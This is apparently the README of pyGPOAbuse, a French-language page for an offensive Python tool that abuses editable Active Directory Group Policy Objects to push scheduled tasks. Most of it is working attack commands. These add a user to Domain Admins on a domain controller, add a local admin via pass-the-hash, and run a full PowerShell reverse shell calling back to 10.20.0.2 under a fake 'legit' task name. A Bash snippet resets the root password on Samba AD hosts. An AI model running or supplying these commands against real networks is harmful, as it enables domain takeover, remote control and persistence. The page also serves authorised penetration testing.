
Implémentation partielle en python de SharpGPOAbuse
Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled):
-filter-enabled Enable GPO Host/User targeting so the scheduled task only runs for a specific host/user
-target-dns-name FQDN
Computer task: DNS/FQDN of the only host that should run the task (e.g. dc01.corp.local)
-target-username DOMAIN\USER
User task: only this user processes the task (format: DOMAIN\username)
-target-user-sid SID User task: SID of the targeted user (optional, more robust matching)
# Add Domain user and add to Domain Admins via Domain-Controller
python3 pygpoabuse.py red.local/user:Testing123 -gpo-id D9A65E7F-112D-49B9-AF7A-4FC2BA092BF6 -taskname SecurityUpdate -dc-ip 192.168.152.2 -command 'net user UserGPO P@ssw0rd /add && net group "Domain Admins" UserGPO /add' -filter-enabled -target-dns-name dc01.red.local
Implémentation partielle en Python de SharpGPOAbuse par @pkb1s
Cet outil peut être utilisé lorsqu'un compte contrôlé peut modifier une GPO existante qui s'applique à un ou plusieurs utilisateurs et ordinateurs. Il créera une tâche planifiée immédiate en tant que SYSTEM sur l'ordinateur distant pour une GPO d'ordinateur, ou en tant qu'utilisateur connecté pour une GPO d'utilisateur.
Le comportement par défaut ajoute un administrateur local.

Ajouter l'utilisateur john au groupe des administrateurs locaux (Mot de passe : H4x00r123..)
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
Exemple de reverse shell
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user
Supprimer la tâche planifiée après exécution.
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --cleanup
Cet outil peut également être utilisé avec les domaines Samba AD. Il créera un travail immédiat en tant que root sur l'ordinateur distant pour une GPO d'ordinateur.
D'abord, créez un script Bash ou un fichier ELF.
#!/bin/bash
echo "root:1234" | chpasswd
Ensuite, exécutez l'outil avec l'argument --linux-exec.
./pygpoabuse.py DOMAIN/user:password -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --linux-exec /path/to/executable
